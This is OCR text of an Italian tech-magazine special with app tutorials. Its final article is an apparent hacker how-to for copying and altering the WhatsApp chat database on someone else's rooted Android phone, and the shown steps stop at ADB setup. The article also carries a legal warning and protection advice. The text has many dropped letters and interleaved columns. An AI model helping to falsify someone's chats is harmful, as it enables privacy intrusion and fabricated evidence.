Aperto il racconto, dal menu a tendina in alto al centro scegliamo il capitolo che ci interessa. Toccando Carattere potremo modiicare colore e luminosit e carattere del libro. In basso il cerchio verde indica lo stato di progresso di lettura. Cominciata la visione del libro, le due barre spariranno lasciando spazio solo al testo.

Arricchiamo la biblioteca

Mentre stiamo leggendo un libro potremo con un solo tap


far riapparire le due barre sullo schermo. In basso a destra,
grazie al pulsante +, potremo aggiungere il racconto alla nostra
biblioteca e con gli altri due pulsanti potremo commentare positivamente il testo oppure condividerlo con i nostri amici tramite social.

Wattpad anche un editor per giovani autori in


erba. Se siamo tra quelle persone che vogliono
sfruttare lapp per far
conoscere al pubblico
le proprie velleit artistiche allora il consiglio
quello di toccare sul
tasto con la matita reclinata. Ci ritroveremo
davanti una schermata
abbastanza intuitiva
e ci verr chiesto di
inserire la foto della
copertina, il titolo della
storia e una breve introduzione, dopodich
verremo reindirizzati in
una nuova pagina in cui
dovremo mettere nome
del capitolo e testo.

Un libro al iorno

Qualunque sia la nostra scelta, i testi salvati andranno a inire


automaticamente nella nostra personale biblioteca. Per accedervi baster premere sul secondo pulsante in basso nellinterfaccia
dellapp partendo da sinistra per ritrovarci dinanzi tutti i libri dai noi
scelti, con tanto di stato di progresso lettura sotto ogni copertina.
Speciali Win Magazine 71

Cos fa lhacker

| Fai il pieno di musica gratis |

Ecco come accedere al nuovo servizio Apple Music per ascoltare


tutte le hit del momento su PC tablet e smartphone

Fai il pieno
di musica gratis
C

on Apple Music la casa della Mela lancia il suo servizio di streaming musicale
anti-Spotify che pu essere utilizzato da
iPhone, iPad, iPod Touch, PC e Mac: in futuro
sar disponibile anche per Android. In pochi
giorni sono stati oltre 10 milioni gli utenti registrati al nuovo servizio che pu essere provato gratuitamente per 3 mesi, trascorsi i quali
si attiva labbonamento a 9,99 euro al mese.
disponibile anche un piano per la famiglia a
14,99 euro al mese che ne consente luso fino a

ATTIVAZIONE DA
IPHONE O IPAD
Per usare il servizio su iPhone, iPad o iPod Touch
assicurati di aver aggiornato il dispositivo ad iOS
8.4 o superiore. Avvia lapp Musica. Se non ti
viene mostrato il messaggio per attivare Apple Music, tocca Per te e conferma con Inizia
la prova gratuita di 3 mesi. Seleziona il tipo di
membership (individuale o per la famiglia). Segui i passi e completa lattivazione col tuo Apple ID. Potrebbe essere richiesta una carta di
credito, utile per il rinnovo automatico trascorsi i tre mesi di prova gratuita.

6 persone. Apple Music permette di accedere


liberamente a una libreria musicale di milioni
di brani e integra la funzione per lascolto offline e la sincronizzazione della propria libreria con iCloud. Si integra con Siri, lassistente
personale dei dispositivi iOS, ed in grado di
suggerire la musica in base ai nostri gusti. In
pratica il servizio riesce ad apprendere le nostre preferenze musicali a seconda delluso che
ne facciamo, cos da suggerirci sempre nuove proposte in linea con ci che ci piace. Pi

Cosa ci
occorre

15 MIN.
FACILE

CLOUD MUSIC

APPLE MUSIC
Quanto costa:
gratuito per 3 mesi
Sito Internet:
http://www.apple.
com/it/music/

lo usiamo, pi lalgoritmo di Apple riesce a lavorare meglio. A tutto questo aggiunge il social network Connect che consente di seguire
i propri artisti preferiti che condividono sulla
piattaforma video e clip esclusive, e la sezione
Radio, da cui possibile ascoltare in streaming
le Web Radio con la musica scelta dai migliori DJ. Non stai nella pelle e anche tu vuoi provare il nuovo Apple Music? Con i nostri trucchi puoi usarlo al meglio e sfruttarne tutte le
funzioni nascoste.

TROVA LA MUSICA
CHE TI PIACE
Per aiutare Apple Music a scovare la musica che ti piace, vai in Per
te. Tocca una volta i generi musicali che ti piacciono, due volte quelli
che ami veramente; se qualcuno non ti piace, tienilo premuto per
farlo scomparire. Prosegui con Avanti e seleziona ora gli artisti
che ti piacciono. Per mostrarne di pi tocca Altri artisti; al termine
tocca Fine. Lapp creer automaticamente delle playlist in base ai
tuoi gusti musicali che potrai iniziare ad ascoltare.

credito. Per impedire che ci avvenga, dallapp


Musica tocca licona con lomino in alto a sinistra, vai in Visualizza ID Apple e fai tap su Gestisci in Abbonamenti. Metti su OFF lopzione
Rinnovo automatico e conferma con Disattiva. Sar comunque possibile riattivare il rinnovo automatico in qualsiasi momento ripetendo
la stessa procedura.

NUOVI SUGGERIMENTI

ATTIVAZIONE DA PC
Apple Music pu essere utilizzato anche
da PC o Mac. Avvia iTunes (www.apple.com/it/
itunes/download): assicurati di aver installato
la versione pi recente cliccando sul pulsante
col punto interrogativo e selezionando Veriica
aggiornamenti. Clicca sullicona Musica in alto a sinistra e vai nella sezione Per te. Clicca
72 Win Magazine Speciali

Pi usi Apple Music, pi lui imparer a


conoscerti, suggerendoti la musica da ascoltare. Per mostrare ulteriori suggerimenti basta trascinare lelenco verso il basso, come
quando si vuole aggiornare la posta in arrivo in
Mail. Se invece una delle proposte non di tuo
su Inizia la prova gratuita di 3 mesi e prosegui per completare lattivazione (come su iOS).

BLOCCA IL RINNOVO
AUTOMATICO
Al termine dei tre mesi di prova, Apple Music si
rinnover automaticamente addebitando il costo dellabbonamento mensile sulla tua carta di

Cos fa lhacker

| Fai il pieno di musica gratis |

gradimento, toccala e tieni premuto il dito per


visualizzare il menu nascosto e poi selezionare
Non mi piace questo suggerimento.

NAVIGA MENTRE
ASCOLTI
Quando sei nella schermata di riproduzione,
puoi continuare a navigare in Apple Music continuando ad ascoltare la musica: basta toccare
la piccola freccia verso il basso, mostrata in alto a sinistra. Il tasto + ti permette di aggiungere la musica alla libreria, mentre quello a forma di cuore non serve per aggiungere un preferito ma per dire allapp che quella musica ti
piace, in modo da aiutarla a capire i tuoi gusti.

SVEGLIA
A SUON
DI MUSICA
Puoi usare i brani che hai in Apple
Music come allarme per la sveglia.
Per farlo, apri lapp
Orologio, tocca il tasto + per aggiungere la nuova sveglia e
vai in Suoni. Basta
un tocco su Scegli
un brano per accedere al proprio catalogo musicale e selezionare la canzone

MUSICA
IN 3G/4G
RIORDINA LELENCO
DI RIPRODUZIONE
Quando trovi una canzone che vuoi aggiungere
alla lista di riproduzione, basta toccare il simbolo con i tre puntini e scegliere Aggiungi in coda.
Dalla finestra In coda puoi visualizzare lelenco dei brani presenti nella lista di riproduzione.
Da qui puoi cancellare la lista o aggiungere altri brani. Per modificare lordine con il quale i
brani verranno riprodotti, invece, tocca licona
hamburger di ogni canzone e trascina verso
lalto o verso il basso.

azzerare le tue selezioni, oppure usa i cerchi per


aggiungere altri generi e artisti.

IN BREVE

Usare Apple Music


con la connessione 3G/4G potrebbe
consumare velocemente il traffico dati a disposizione; per
questo,per impostazione predefinita,
attivo il blocco per
luso solo via Wi-Fi.
Se, per, puoi ascoltare la musica anche
fuori casa, vai in Impostazioni/Musica e
metti su On lopzione Usa dati cellulari presente in Playback & Downloads..

SCOPRI DI PI
DELLARTISTA
device. Per liberare spazio, si possono eliminare i brani toccando il simbolo con i tre puntini e
selezionando Rimuovi il download.

CONNETTITI AI TUOI
ARTISTI PREFERITI
Apple Music ti permette di seguire le attivit
dei tuoi artisti preferiti. I contenuti condivisi dagli artisti vengono mostrati nella scheda Connect. Per visualizzare quali artisti stai seguendo tocca Vedi chi stai seguendo. Per impostazione predefinita vengono inseriti tutti quelli di cui aggiungi un brano nella libreria musicale. Puoi per disabilitare questa opzione in
modo da seguire solo quelli che ti interessano
davvero. Per rimuoverne uno dalla lista, tocca
il pulsante Non seguire pi.

Se stai ascoltando un brano di una playlist e


vuoi conoscere pi informazioni su album, artista e altro, apri la lista di riproduzione e tocca
il tasto con i tre punti a destra della canzone. In
cima al menu nascosto viene mostrata la copertina dellalbum col nome dellartista. Tocca
sulla freccia verso destra per visualizzare maggiori informazioni ed eventualmente aggiungerlo alla libreria.

RIMUOVI CONNECT
In Apple Music stato introdotto il social network Connect, che consente di seguire
i propri artisti preferiti. Se non ti interessa, puoi
rimuoverlo andando in Impostazioni/Generali/
Restrizioni e disabilitando lopzione Apple Music (Connect). SulliPad, che ha uno schermo pi
grande, questa azione servir a far scomparire
licona Connect dalla barra in basso. SulliPhone, invece, la sostituir con Playlist che era stata rimossa proprio per far spazio a Connect.

MODIFICA LA MUSICA
CHE TI PIACE
Se hai cambiato gusti e non ti piacciono pi i
generi che hai fatto imparare ad Apple Music,
puoi cambiarli. Per farlo, vai in Per te e tocca
licona con lomino in alto a sinistra. Seleziona
Scegli artisti per te e tocca Ripristina se vuoi

I TESTI ALLINTERNO
DEL CENTRO NOTIFICHE
RIPRODUZIONE
OFF-LINE
Puoi ascoltare la musica in modalit off-line, scaricandola sul dispositivo quando sei connesso
in Wi-Fi! Tocca licona con i tre puntini e seleziona Rendi disponibile ofline. In questo modo
potrai ascoltare musica anche senza una connessione dati o evitando di consumare il traffico dati 3G/4G. Per visualizzare i brani scaricati
sul telefonino vai nella sezione Musica, tocca il
selettore della categoria (Artisti, Album, Brani
e altro) e metti su On il selettore Mostra brani
disponibili ofline: in questo modo saranno visualizzati solo i brani salvati nella memoria del

Vuoi usare Apple Music come una sorta di karaoke e cantare a squarciagola sui tuoi brani
preferiti? DallApp Store installa lapp gratuita MusixMatch. Apri il Centro notiiche e
dalla scheda Oggi scorri ino in basso e fai tap su Modiica. Cerca le applicazioni presenti e tocca il segno + in
corrispondenza di MusixMatch per aggiungerla
e spostarla in alto. Tocca
Fine per completare.
Ora vai in Musica e avvia
la riproduzione dei brani: accedendo al Centro
notiiche visualizzerai i
testi sincronizzati con le
canzoni.

Speciali Win Magazine 73

Cos fa lhacker

| Fai da te | Il passepartout musicale! |

Il passepartout
musicale!
C un modo sconosciuto ai pi per comandare a
distanza computer e smartphone altrui utilizzando
la voce e i suoni. Provare per credere

e esiste una prerogativa di


I nter net d a l lav vento d i
questu lt ima nelle nost re
case, sicuramente la condivisione, Il fenomeno dello sharing, la
compulsiva dipendenza derivante
dallutilizzo di Internet ci che
pi ha cambiato le vite di tutti,
forse anche pi della rete stessa.
La potenza, quindi, sprigionata da

questo strumento va sempre pi al


di l delle nostre aspettative, tanto anche dietro questo strumento
possono nascondersi minacce informatiche di cui non conosciamo
neanche la natura. Con le applicazioni giuste basta una semplice
coppia di altoparlanti per PC per
condividere e scambiare tramite la
musica informazioni sensibili (ad

Cosa ci
occorre

15 MIN.
FACILE

ESTENSIONE PER
GOOGLE CHROME

GOOGLE TONE
Quanto costa: Gratuita
Sito Internet: https://
chrome.google.com
APP ANDROID

CHIRP
Quanto costa: Gratuita
Sito Internet:
https://play.google.com
SOFTWARE
PER LE GESTURE

FLUTTER
SOFTWARE COMPLETO
Lo trovi su: DVD

esempio le pagine Web visitate) con


altri computer

La nuova era dello sharing


Chiunque abbia un PC conosce Google, un po perch il compagno
fedele di ogni internauta e un po
perch fornisce gratuitamente una
tale quantit di servizi dai quali
difficile staccarsi. In pochi per

Ti entro nel PC con un suono!


Grazie allapp Google Tone di Chrome possiamo prendere il comando del browser di qualsiasi computer
semplicemente facendo riprodurre agli altoparlanti una sequenza di note.

Ci basta un plugin

La prima cosa da fare installare un plugin per Chrome. Raggiungiamo lo store di


Google da chrome.google.com/webstore e cerchiamo, nel tab di ricerca, google tone. Clicchiamo in alto a destra il pulsante Aggiungi a Chrome per avviare il download e linstallazione.

74 Win Magazine Speciali

Pronti a trasmettere!

Ai nostri vicini che hanno Chrome aperto e il plugin installato, possiamo inviare
un link di qualunque sito. Baster visitare una
pagina Web e quando vogliamo condividerla clicchiamo sul tasto in alto a destra a forma di megafono: occhio ad alzare al massimo il volume!

Beep beep il link servito

Se tutto OK, riceveremo un avviso che


ci notiica che il link stato suonato
correttamente. Questo non avviene sempre, capiter soprattutto dopo i primi beep condivisi. Non
resta quindi che divertirci scambiando link divertenti con chiunque sia a portata dorecchio.

| Il passepartout musicale! | Fai da

sanno quanto lazienda sia unincubatrice di progetti avangua rdistici, quasi sconfinanti nella fan
ntascienza: da questi, per, spesso
nascono e si evolvono soluzioni
che ci cambiano il modo di comunicare. Un esempio? Google
Tone. Questa funzione
si presenta come
u n ba na le
plug-in da

Cos fa lhacker
installarre nel browser Chrome,
ma racchiude una potenzialit realiizzata in maniera tanto
li quanto geniale. Vesemplice
diamo un caso duso. Siamo in ufficio, tutti i nostri colleghi hanno
Chrome in esecuzione col plug-in
Tone installato e siamo su
una pagina Web che

vogliamo condividere con tutti.


Bene, alziamo il volume del nostro
PC e premiamo il pulsante Tone:
una melodia verr letteralmente
ascoltata da tutti i computer nelle vicinanze che apriranno come
per magia proprio la pagina Web
che abbiamo condiviso! Google
per ora si limitata nel permettere la condivisione di siti Web, ma
non escluso che in futuro, viste
le potenzialit, si possa anche condividere altro, con gli sviluppo che
possiamo immaginare.

ANCHE CON IL KINECT PUOI COMANDARE IL PC CON LA VOCE!


Una delle funzioni interessanti del nuovo sensore
Kinect 2 di Microsoft che consente utilizzare la voce
pereseguiredelleazioni.Sipossonoinfattiavviareilm,
brani, fare ricerche on-line ed eseguire applicazioni. Il
dispositivo permette anche di controllare tutto con
le mani con una precisione al millimetro, eseguendo
semplici gesture anche personalizzabili. Quanto alle
caratteristiche tecniche, a differenza del modello
precedente, Kinect 2 per Windows pu registrare
video nel formato FullHD a 1080p, ofre una maggiore
profondit di campo, una migliore fedelt cromatica
e un tracciamento dello scheletro pi preciso. Inoltre

consente allutente di ridurre la distanza dal sensore,


rendendonepossibilelusoinstanzedipiccoledimensioni.Inine,ilsensoreIRpurilevareadessolegesture
degliutentiancheincondizionidibassailluminazione.

Esiste una versione apposita per PC, oltre a quella


nativa per Xbox One, con la quale si pu interagire
col sistema operativo Microsoft dimenticandosi di
mouse e tastiera.

TELECAMERA RGB

EMETTITORI INFRAROSSI

SENSORI DI PROFONDIT

SPIA ACCENSIONE

MICROFONI

Le funzioni del sensore Kinect 2 di Microsoft sono implementate


grazie a una serie di dispositivi e componenti elettronici che rilevano
movimento e suoni. Eccoli nel dettaglio.

Speciali Win Magazine 75

Cos fa lhacker

| Fai da te | Il passepartout musicale! |

Scambio ile a colpi di bip!


Ecco il trucco per condividere tramite i suoni immagini, video, appunti e link utilizzando i dispositivi mobile.

Una veloce installazione

Iniziamo con scaricare lapplicazione su


smartphone o tablet Android (ma disponibile anche per iOS). Apriamo il Play Store di Google e cerchiamo chirp tramite la barra delle ricerche. Non ci resta ora che toccare su INSTALLA
per avviare il download e linstallazione dellapp.

Uninterfaccia semplice e
intuitiva

Una volta installato, apriamo Chirp: lapplicazione si presenta con uninterfaccia molto amichevole mostrando in primo piano dei pulsanti che
ci faranno condividere con dei suoni diverse categorie di ile, dalle foto ai link.

Condividiamo unimma ine

Dallinterfaccia principale tocchiamo + nella barra in basso. Per condividere una foto
dalla galleria selezioniamo Add from Gallery o scegliamo Take Picture. Selezioniamola, attendiamone il caricamento e premiamo il pulsante giallo per
iniziare la condivisione con i dispositivi in ascolto!

Il PC si comanda con la mano!


Siamo pronti adire addio mouse e tastiera? Adesso basta utilizzare la Webcam per controllare le applicazioni
preferite. Ecco come fare utilizzando il tool Flutter.

suficiente il primo avvio

Assicuriamoci che la Webcam sia collegata


al PC ed estraiamo larchivio Flutter.zip (lo
troviamo sul DVD allegato), quindi eseguiamo il ile
Flutter.msi che installer il software senza richiedere ulteriori interventi, conducendoci al tutorial di
conigurazione.
76 Win Magazine Speciali

Basta prenderci la mano

Clicchiamo Im Ready e posizioniamo la


mano davanti alla Webcam a circa un metro
di distanza, cos come mostrato nelle illustrazioni
desempio. I gesti richiesti sono gli stessi che ci consentiranno di avviare/arrestare la riproduzione dei
brani e passare a quello successivo o precedente.

Il potere... in una mossa!

Finita lesercitazione, Flutter rester attivo


nella barra delle applicazioni, intervenendo
solo se necessario. Avviando iTunes, Windows Media
Player, VLC, Spotify oppure Chrome (YouTube e altri),
entrer in azione captando i gesti delle nostre mani
e impartendo i comandi al media player.

Cos fa lhacker

| Il passepartout musicale! | Fai da te |

BUONI
CONSIGLI
FACCIO TUTTO
CON LE MANI

I contenuti si condividono cos

Allo stesso modo spiegato nel passo precedente potremo condividere i contenuti: chi li ricever
dovr anchegli aver installato Chirp sul proprio dispositivo e tenere lapp aperta, che si occuper di restare sempre in ascolto.

Il clone di Tone su smartphone

Sulla stessa riga di Tone, anche con Chirp possibile


inviare link allo stesso modo di note e foto. Risulter
forse un po meno intuitivo, ma niente di trascendentale: dal
solito menu scegliamo Add Link e incolliamo lindirizzo del sito
che vogliamo condividere.

CON SEMPLICI GESTI IL PC AI TUOI ORDINI


Posizionando la mano davanti alla Webcam e utilizzando Flutter,
oltre a controllare applicazioni come iTunes, Windows Media Player e
Winamp o Spotify, adesso possiamo impartire dei comandi per alcuni
servizi Web. Vediamo quali sono.
COMANDO

PLAY/PAUSA

AVANTI
(VIDEO/CANZONE
SUCCESSIVA)

Se vogliamo uninterazione col nostro


smartphone Android
in stile Star Trek,
potremmo optare per
Hovering Controls.
una semplice app che
sfrutta la fotocamera
frontale del telefono e
il sensore di prossimit,
grazie ai quali riconosce
i movimenti della mano
permettendo di associare azioni speciiche a
eventi speciici. Baster
lasciare il telefono sul
tavolo e sventolare la
mano a destra o sinistra
per cambiare i brani in
esecuzione o avviare
unapp muovendo la
mano in senso circolare,
e cos via.

LA WEBCAM CHE GUARDA


AL FUTURO
Intel con la collaborazione di
Creative, ha sviluppato RealSense, unavveniristica Webcam che permette diestrarre
la tridimensionalit di un ambiente o di uno spazio esterno e apre in realt le porte
a una miriade di possibilit,
tutte molto stimolanti. La pi
ovvia quella di cambiare il
fuoco di una foto gi scattata,
cosa che peraltro fanno gi
diversi smartphone, seppur
con tecnologie diverse. Tuttavia RealSense consentir
molto di pi, perch la capacit di rilevare lambiente
nella sua spazialit render

possibile ad esempio eliminare selettivamente uno dei


piani che lo compongono, per
rimuovere oggetti o persone
indesiderate in uno scatto ma
anche per consentirci di effettuare una videochiamata
di lavoro da casa invece che
dalluicio, eliminando dettagli personali dalla ripresa. Gli
utilizzi pi avveniristici sono
sicuramente quelli che hanno
a che fare con la cosiddetta
realt aumentata e con il riconoscimento delle gesture,
per interagire con i device in
maniera touchless e anche a
distanza.

INDIETRO
(VIDEO/CANZONE
PRECEDENTE)

Speciali Wi
Win M
Magazine
i 77

Cos fa lhacker

| Software | Ashampoo Music Studio 5 |

Ecco come estrarre i brani audio dai nostri video preferiti


per creare una compilation musicale personalizzata

Ashampoo Music Studio 5 che in pochi clic ci


permetter di creare la nostra personalissima
compilationmusicale.Grazieallasuainterfaccia
semplice e intuitiva, anche operazioni come
queste,chepossonoirretireedemotivareimeno
esperti, diventano davvero un gioco da ragazzi
alla portata di chiunque.

Estrai, converti e masterizza


Terminata lestrazione dellaudio da una sorgente video, possibile tagliarla e organizzarla
in tracce separate, ma anche ottimizzarla con
funzionalit ad hoc per una migliore resa
sonora. Music Studio 5 anche un provetto

20 MIN.
FACILE

EDITOR AUDIO

Dal DVD Video


al CD Audio
uante volte abbiamo pensato: che bella
la musica di questo video, mi piacerebbe
poterla ascoltare da CD o tramite il lettore
MP3. Per mettere in pratica un simile intento
c bisogno di un editor in grado di trasformare laudio presente in qualsiasi filmato in una
traccia musicale dal formato standard, che
successivamente possiamo tranquillamente
masterizzaresuunsupportotradizionale,come
ad esempio un Compact Disc, oppure trasferire
direttamentenelplayerportatile.Robadastudio
di registrazione professionale? Forse s, ma per
fortuna possiamo allestirne uno direttamente
nel nostro computer! Win Magazine ci regala

Cosa ci
occorre

ASHAMPOO
MUSIC STUDIO 5
Lo trovi su: DVD
SOFTWARE COMPLETO
Sito Internet:
www.ashampoo.com

Organizer, che consente di gestire al meglio


lintera raccolta musicale presente nel tuo
computer. E non finisce qui. Se lo desideri puoi
anche registrarti quando canti o mente suoni
uno strumento musicale. E ancora, realizzare
dei missaggi di pi brani da utilizzare per
feste e intrattenimento. Tra le funzionalit
di servizio, inoltre, spiccano quella per la
creazione di copie di sicurezza dei propri CD
musicali e per la realizzazione delle copertine. Insomma, un software all-in-one che
trasforma il tuo PC in una stazione di lavoro
per organizzare ed elaborare al meglio tutta
la tua musica.

Richiediamo il codice seriale


La procedura di registrazione di Ashampoo Music Studio 5 richiede pochi minuti ed completamente gratuita.
Una volta terminata potremo utilizzare il software senza alcun limite di tempo e funzionalit.

Avviamo linstallazione

Una breve registrazione

Clicca due volte sul file ashampoo_


music_studio_5_19220.exe che troviamo nellInterfaccia principale del Win DVD-Rom.
Semplici istruzioni a video ci permetteranno di
registrare la nostra copia e godere di tutte le sue
funzionalit senza limiti di tempo.

Per continuare listallazione clicchiamo


Ottieni una chiave di attivazione gratuita. Nella pagina Web visualizzata inseriamo un
indirizzo e-mail, nello spazio sotto Ottieni la tua
chiave di versione completa ora, e clicchiamo
su Richiedi chiave per versione completa.

78 Win Magazine Speciali

Ecco il nostro codice seriale

Possiamo terminare la registrazione inserendo i dati richiesti. Ottenuto il codice di


attivazione da inserire nel programma, copiamolo
negli appunti (Ctrl+C ) torniamo allinstallazione
del software e clicchiamo Copia dagli Appunti e
poi Attiva Ora! e il gioco fatto.

Cos fa lhacker

| Ashampoo Music Studio 5 | Software |

Estraiamo laudio da un video


Music Studio 5 permette di caricare video in svariati formati, tra cui MPEG-2 ed MPEG-4, ed estrapolarne laudio
per trasformarlo in una traccia autonoma. Vediamo come procedere.

Mettiamoci allopera

Per prima cosa avviamo il programma.


Nellinterfaccia principale clicchiamo il
pulsante Video/Music. Clicchiamo ora su Fai clic
qui per aprire un ile video. Selezioniamo il ilmato che desideriamo caricare e clicchiamo Apri.
Terminata lestrazione clicchiamo Avanti.

Sce liamo il formato

Selezioniamo il formato di salvataggio della traccia cliccando uno dei pulsanti sotto Formato di emissione, ad esempio MP3. Ora
selezioniamo la qualit di inalizzazione cliccando
uno dei pulsanti Media, Buona, CD o Alta Qualit. Fatto questo clicchiamo Avanti.

Salviamo la traccia

Nella nuova schermata selezioniamo la


cartella di destinazione per il salvataggio della traccia audio estratta. Cliccando Avanti il software procede al salvataggio del ile nella
posizione scelta. Torniamo quindi al menu principale cliccando Vai al menu principale.

Creiamo il nostro CD Audio


Estratte le tracce audio dai tuoi ilmati non resta che creare una compilation da inalizzare su un supporto standard,
ad esempio un CD audio, che possiamo ascoltare in auto o sul nostro impianto Hi-Fi di casa.

Scegliamo il tipo di supporto

Per prima cosa dobbiamo tornare al menu


principale e cliccare il pulsante Masterizza.
A questo punto il sistema propone diversi tipologie di masterizzazione. Nel nostro caso clicchiamo il pulsante Masterizza CD Audio, il primo che
vediamo a sinistra.

Aggiungiamo le tracce

Se le tracce estratte si trovano in cartelle


diverse clicchiamo Aggiungi File e selezioniamole una a una. Se invece si trovano tutte nella
medesima directory clicchiamo Aggiungi Cartella
e selezioniamo quella che le contiene tutte. Clicchiamo Avanti.

E ora si masterizza!

Inseriamo un CD vuoto nel masterizzatore. Seleziona lunit di scrittura e clicca su


Avanti. Il processo di scrittura ha inizio. Una volta
terminato, estraiamo il CD dal lettore e torniamo
al menu principale cliccando sul pulsante Vai al
menu principale.
Speciali Win Magazine 79

| WhatsApp bucato |

Whatsapp
bucato!
Centro sicurezza
Win Magazine
Cosa ci
occorre

15 MIN.
FACILE

EDITOR SQL

SQLITESTUDIO
Lo trovi su: CD DVD
SOFTWARE COMPLETO
Sito Internet:
http://sqlitestudio.pl
DEBUGGER ANDROID

ADB
SOFTWARE COMPLETO
Sito Internet:
http://developer.
android.com

80 Win Magazine Speciali

Trovato il modo per accedere alla


cronologia delle chat del noto social,
manipolare i testi delle conversazioni
e rovinare la reputazione altrui

egli ultimi tempi, WhatsApp


sembra essere diventato il
bersaglio preferito di pirati e
smanettoni interessati a sbirciare
nelle conversazioni altrui. Su Win
Magazine 210, ad esempio, abbiamo scoperto quanto facile spiare
le chat e rubare contenuti personali
utilizzando tecniche tuttaltro che
avanzate. Ora la famosa app di messaggistica istantanea di nuovo sotto
tiro per colpa di una vulnerabilit
che permette di accedere allarchivio
delle conversazioni e modificarne
il contenuto, anche se queste sono
gi state visualizzate da entrambi i
membri della chat, con conseguenze facilmente immaginabili per la
povera vittima di turno! Ad un malintenzionato basta mettere le mani
sullo smartphone per i pochi secondi sufficienti a copiare sul proprio
PC il database con tutti i messaggi
archiviati, modificarne qualcuno,
aggiornare larchivio e rimettere tutto
a posto. Pochi e semplici passaggi
sufficienti per rovinare la reputazione altrui. comunque doveroso
precisare che possibile effettuare
tale modifica soltanto su dispositivi
Android ai quali siano stati concessi i
permessi di super user, il noto root
per intenderci (una procedura che
ormai alla portata di tutti).
La magia resa possibile dal
fatto che Whatsapp memorizza i
messaggi delle varie conversazioni allinterno di un database non

crittografato, che a sua volta viene


memorizzato in chiaro in una delle directory del sistema operativo.
Si tratta quindi di prelevare tale
file, modificarlo a proprio piacimento sul computer e reinserirlo
modificato allinterno dellapp sul
dispositivo, cosicch le conversazioni risultino manipolate rispetto
a quelle originali.

Per quale motivo


taroccano i messaggi?
Le motivazioni sono diverse: si potrebbe, ad esempio, voler alterare
un messaggio per nascondere un
tradimento amoroso, oppure per un
semplice scherzo tra amici vantandosi di una fantomatica avventura.
Come sempre, per, non tutti han-

no intenzioni benevole ed eventuali


malintenzionati potrebbero voler
alterare conversazioni di WhatsApp
contenenti messaggi illegali o minatori. Anche se alterati, infatti, i messaggi risulterebbero autentici non
solo ai profani, ma anche agli occhi
di un esperto informatico che erroneamente potrebbe certificare che
il testo non ha subito alcun tipo di
manipolazione. Per fortuna in Italia i
messaggi scambiati su Whatsapp (e in
generale quasi tutte le comunicazioni
digitali) non sono ammissibili come
prove in tribunale.

Ecco come proteggersi


dai manipolatori di chat
Ci non toglie che sempre fondamentale prendere le neces-

ATTENZIONE!
Accedere ai messaggi che qualcun altro si scambia via WhatsApp potr anche essere
facile almeno per qualcuno ma, salvo a non avere ilpermessodeltitolaredellaccount
ssodeltitolaredellaccount,
illecito almeno quanto leggere la posta elettronica direetta a qualcun altro. E pu
costare caro! Chi, infatti, accede agli altrui messaggisalvattisuuntelefoninocompie
uninterminabile sequenza di reati che vanno dallaccessoo abusivo ad un sistema
informatico, alla violazione delle altrui comunicazionieletttronichee/o
corrispondenza telematica, passando per la violazionedellapprivacy.Se
poi, oltre ad accedere, si modiica anche il contenutodeimeessaggi,
allelenco che precede, si rischia di dover aggiungereancheilfalso
materiale e/o ideologico. Insomma, magari sembreranchee un
gioco, ma davvero non lo .
Avv. Guido Scorza

Cos fa lhacker

| WhatsApp bucato |

Violare il database delle chat


Innanzitutto occorre scaricare ed installare sul PC i driver e i programmi necessari per riconoscere lo
smartphone, accedere alla sua memoria interna e prelevare il ile contenente le conversazioni di WhatsApp.

Il kit dellhacker

Il prompt comandi Android

Dalla sezione Antivirus&Sicurezza scarichiamo larchivio compresso WhatsKit.zip.Al suo


interno troveremo tutti i software da installare sul
computer e necessari per eseguire la procedura di
accesso alla memoria dello smartphone. Estraiamo
quindi il larchivio sul Desktop del nostro computer.

sarie precauzioni per evitare di


ritrovarci nostro malgrado in
una cos spiacevole situazione.
Innanzitutto, evitiamo di lasciare incustodito lo smartphone e
ricordiamoci sempre di attivare
il blocco dello schermo: ad un
eventuale malintenzionato, infatti, serve dare le autorizzazioni
di super user per poter accedere
allarchivio delle conversazioni e
lunico modo per impedirlo , appunto, luso di un PIN, una password o una sequenza di sblocco.
Per verificare la reale pericolosit
di questa vulnerabilit abbiamo
quindi deciso di sacrificare uno
smartphone simulando un attacco
nei nostri laboratori e riuscendo a
manomettere in maniera davvero
semplice il database di WhatsApp.
Vale la pena ricordare a tutti che le
procedure descritte nellarticolo
vengono presentate esclusivamente a scopo illustrativo e possono essere messe in pratica solo
sui nostri dispositivi o su quelli di
amici informati di quanto stiamo
facendo.

Entriamo nella nuova directory WhatsHack e


installiamo il ile ADB.exe con un doppio clic
su di esso. Si avvier una classica shell dei comandi: alla richiesta di installazione del tool e dei vari
componenti premiamo semplicemente il tasto Y sulla
tastiera e confermiamo premendo Invio.

Ecco il driver iusto

Ultimiamo linstallazione dei driver Android


seguendo le istruzioni a video. Al termine,
colleghiamo lo smartphone al PC. Nel menu Start
selezioniamo col tasto destro licona Computer e
clicchiamo Propriet. In Gestione Dispositivi, veriichiamo che i driver siano installati correttamente.

COS INSTALLIAMO I DRIVER ANDROID ANCHE


SU WINDOWS 8 E 10
La procedura appena vista nel Macropasso precedente potrebbe non funzionare se sul computer
installato Windows 8/8.1 oppure 10. In questi casi
occorre impostare il sistema operativo per consentire
linstallazione di software anche da sorgenti non
certiicate da Microsoft. In particolare, se abbiamo
Windows 10, cerchiamo Impostazioni nel campo
di ricerca della barra delle applicazioni e selezioniamo questa voce nei risultati. Accediamo quindi alla

sezione Aggiornamento e sicurezza/Ripristino e


in Avvio avanzato clicchiamo Riavvia ora. Dopo il
riavvio del PC e la visualizzazione della schermata
Scegli unopzione selezioniamo Risoluzione dei
problemi/Opzioni avanzate/Impostazioni di avvio
e clicchiamo Riavvia. Dopo il riavvio del PC, nella
schermata Impostazioni di avvio premiamo il tasto
7 sulla tastiera per disabilitare limposizione della
irma dei driver. Verr cos completato il riavvio di
Windows 10. A questo punto possiamo procedere
con linstallazione dei driver Android seguendo la
procedura del Macropasso precedente.
Speciali Win Magazine 81

Cos fa lhacker

| WhatsApp bucato |

Cos si tarocca un messaggio


Installati i driver Android sul computer, siamo pronti per scaricare dalla memoria dello smartphone il database
con tutte le conversazioni di Whatsapp, per modiicarle senza lasciare alcuna traccia!

Il prompt comandi di Android

Il telefono collegato al PC?

Se i driver USB sono correttamente installati, rechiamoci nella directory C:\adb\. Tenendo
premuto i tasti Ctrl+Shift, clicchiamo col tasto destro
del mouse in unarea vuota della inestra e selezioniamo lopzione Apri inestra di comando qui dal menu
contestuale che appare.

Digitiamo nella shell il comando adb devices


e clicchiamo Invio. Controlliamo che sotto la
stringa List of devices attached compaia un codice
identiicativo, che rappresenta il nostro smartphone. Se
non rileviamo nulla, controlliamo di avere i permessi di
root sul dispositivo.

Ecco larchivio delle chat

Un editor per il database

